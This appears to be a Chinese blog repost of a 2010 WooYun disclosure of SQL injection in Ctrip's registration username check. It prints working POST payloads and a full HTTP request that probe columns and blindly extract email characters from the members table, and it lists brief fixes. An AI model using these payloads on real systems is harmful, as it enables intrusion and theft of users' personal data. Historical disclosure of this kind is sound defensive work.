携程网某ajax验证存在sql注入

最新推荐文章于 2024-07-18 08:53:07 发布
原创 最新推荐文章于 2024-07-18 08:53:07 发布 · 4.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #安全 #hack #wooyun

此博客详细记录了一起2010年的漏洞事件,涉及CTrip网站members表的SQL注入,可能泄露用户敏感信息。漏洞从厂商处理到公开,逐步揭示,最终通过白名单验证和屏蔽错误进行修复。

漏洞详情

披露状态:

2010-07-30: 细节已通知厂商并且等待厂商处理中
2010-07-30: 厂商已经确认,细节仅向厂商公开
2010-08-09: 细节向核心白帽子及相关领域专家公开
2010-08-19: 细节向普通白帽子公开
2010-08-29: 细节向实习白帽子公开
2010-08-29: 细节向公众公开

简要描述:

位置较敏感,发生在members表,可以发现表的一些字段,能够窃取任何人的包括email等信息,未深入测试

详细说明:

用户注册时,"验证用户是否存在"因过滤不严谨导致sql注入
另外:
http://www.ctrip.com/robots.txt
http://destguides.ctrip.com/destguides/journals/AllSingleJournals.aspx?Writing=130079%27%273
暴露了敏感信息

漏洞证明:

http://www.ctrip.com/member/CheckUser.asp
post: signup_uid=xyyxx1x'/**/order/**/by/**/1--
post: signup_uid=xyyxx1x'/**/order/**/by/**/uid--
post: signup_uid=xyyxx1x'/**/order/**/by/**/email--
尝试不正确的字段导致不同结果,输入".`"等字符及其它注入手段测试(可能存在ids)

POST /member/CheckUser.asp HTTP/1.1
Accept: */*
Accept-Language: en-US,zh-cn;q=0.5
Referer: http://www.ctrip.com/member/signup.asp
If-Modified-Since: Thu Jan 1 08:00:00 UTC+0800 1970
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)
Host: www.ctrip.com
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 
signup_uid=jquery1'/*and*/and/**/sUbstRing(email,1,1)=char(0)/**/order/**/by/*and 1=1*/email--

修复方案:

1.白名单验证
2.屏蔽或友好提示错误

版权声明:转载请注明来源 路人甲@乌云

Sword-heart
关注
Python爬虫实战:携程旅游平台数据爬取(酒店+机票+景点),破解加密与反爬(附完整代码)
专注于Python爬虫开发,分享爬虫技巧、项目实战与反爬经验,使用Scrapy、BeautifulSoup等工具,解决数据抓取难题。
12-17 547
携程的反爬机制再复杂,核心逻辑都是“识别非真实用户的请求”,而爬虫的核心就是“让请求看起来像真实用户的行为”。本文的方案从登录态处理、参数加密破解、动态数据抓取,到反爬应对,都是围绕“模拟真实”展开:用Playwright模拟真实浏览器登录,用住宅代理模拟真实用户IP,用随机延迟模拟真实用户的操作频率。掌握了这个核心思路,无论平台的反爬如何升级,都能找到应对方法。当然,爬虫技术是一把双刃剑,合理使用才能发挥其价值。如果你的爬虫项目中遇到了携程的反爬问题,不妨按照本文的步骤试试,大概率能解决问题。
某赛通电子文档安全管理系统 PolicyAjax SQL注入漏洞复现
0xSec
01-31 1283
由于某赛通电子文档安全管理系统PolicyAjax处的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
sql注入AJAXSQL Injection (AJAX/JSON/jQuery))
weixin_34409822的博客
10-14 1852
2019独角兽企业重金招聘Python工程师标准>>> ...
ajax提交sql注入,ajaxpro存在SQL注入漏洞?
weixin_39940154的博客
08-05 489
分析下”洞网/”,环境架好后.找到有问题的语句:End IfElseusername=trim(Dvbbs.CheckStr(request("username")))If ajaxPro Then username = unescape(username)End Ifusername带入到查询语句如下:If ChkUserLogin(username,password,mobile,userco...
公众平台无限回调系统 /user/ajax.php SQL注入漏洞
weixin_43167326的博客
07-18 607
微信公众平台无限回调系统是一种旨在提升企业客户服务体验和运营效率的工具。该系统通过一系列智能化和自动化的功能,帮助企业与用户之间建立更加便捷、高效的沟通桥梁。
php sql json防注入,sql注入AJAXSQL Injection (AJAX/JSON/jQuery))
weixin_36268390的博客
03-13 370
sql注入AJAX(SQL Injection (AJAX/JSON/jQuery))0x1网上搜下没有关于ajaxsql注入文章,这里简单写一下抛砖引玉。原理自己百度,这里简单说下:通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。0x2我这里用一个漏洞示例程序bWAPP来演示,先看下正常访问的情况:输...
Ajax post sql注入,cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
weixin_39778582的博客
08-05 476
摘要cmseasy前台无需登录直接获取敏感数据的SQL注入cmseasy 前台无�cmseasy前台无需登录直接获取敏感数据的SQL注入cmseasy 前台无视gpc的sql注入我下载的是最新版本的cmseasy,之前有人提过这里的漏洞,官方进行了修补,但是越修补,越捉急,直接看代码:这里是注册函数的地方celive.class.php(480-497):function xajax_live()...
携程网同款城市日历选择功能开发解析
同时,对用户输入进行验证和清洗,防止SQL注入安全问题。 ### 结论 类似携程网的城市、日历选择功能的实现涉及到前端的交互设计、组件使用,以及后端的数据处理、接口设计等多个方面。这些功能不仅需要考虑用户...
携程城市选择插件:便捷的出发地与目的地筛选
这种插件广泛应用于在线旅行预订平台,如携程网。用户在使用这些平台预订机票、酒店、旅游套餐等服务时,通常需要指定出发地和目的地,而城市选择插件就是为这一操作提供便捷和高效的服务。 该插件的功能特点包括:...
实训笔记2.0
m0_65456462的博客
03-24 534
3.22 CSRF漏洞介绍 CSRF (Cross--site request forgery,跨站请求伪造))也被称为 One Click Attack 或者 Session Riding,通常缩写为 CSRF 或者 XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与 XSS 非常不同,XSS 利用站点内的信任用户,而 CSRF 则通过伪装成受信任用户请求受信任的网站。与 XSS 攻击相比,CSRF 攻击往往不大流行(因此对其进行防范的资源也相当稀少)也难以防范,所以被认为比 X
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4744
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入
ajax防止sql注入,spring 防止SQL注入的拦截器
weixin_35551554的博客
08-06 578
package org.jeecgframework.core.interceptors;import java.util.Enumeration;import java.util.List;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import org.ap...
ajax漏洞 sql注入,易想团购ajax.php SQL注入分析和Exp漏洞预警 -电脑资料
weixin_29696999的博客
08-06 619
在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax验证的也就是ajax.php,* 验证会员数据 */ function check_user($field_name,$field_data) { //开始数据验证 $user_data[$field_name] = $field_data; $res = array('status'=>1,'info'=>'',...
sql注入攻击
gaisidewangzhan1的博客
05-15 865
转载::常见攻击方式一般说来,在Web安全领域,常见的攻击方式大概有以下几种:1、SQL注入攻击2、跨站脚本攻击 - XSS3、跨站伪造请求攻击 - CSRF4、文件上传漏洞攻击5、分布式拒绝服务攻击 - DDOSSQL注入产生的原因,和栈溢出、XSS等很多其他的攻击方法类似,就是未经检查或者未经充分检查的用户输入数据,意外变成了代码被执行。也就是,SQL注入是用户输入的数据,在拼接SQL语句的过...
最详细SQL注入教程
热门推荐
li898445911a的专栏
08-10 2万+
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。  SQL注入是从正常的WW
jquery过滤特殊字符',防sql注入
mituan1234567的专栏
06-18 935
http://blog.youkuaiyun.com/xb12369/article/details/8446248 今天写的代码给项目经理看了下,因为之前没有考虑sql注入的问题,然后在他测试我的code的时候,打了一个“'”,然后我的程序就挂了! 于是乎,我在网上找到了一个验证过滤文本框的jquery! 先上图: PS:这里用@#测试,因为'太小了,都
SQL注入—我是如何一步步攻破一家互联网公司的
wetest_tencent的博客
04-15 1230
本文由腾讯WeTest团队提供,更多资讯可直接戳链接查看:http://wetest.qq.com/lab/ 微信号:TencentWeTest最近在研究Web安全相关的知识,特别是SQL注入类的相关知识。接触了一些与SQL注入相关的工具。周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞。不试不知道,一试还真TM得逞了,内心有些小激动,特在此写博文一篇,...
ajax漏洞+sql注入
最新发布
08-23
通过代码审查和自动化测试工具,确保代码中不存在SQL注入漏洞。 ### 8. 使用ORM框架 对象关系映射(ORM)框架(如SQLAlchemy、Hibernate等)可以自动处理SQL语句的生成,避免手动拼接SQL语句带来的风险。ORM框架...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值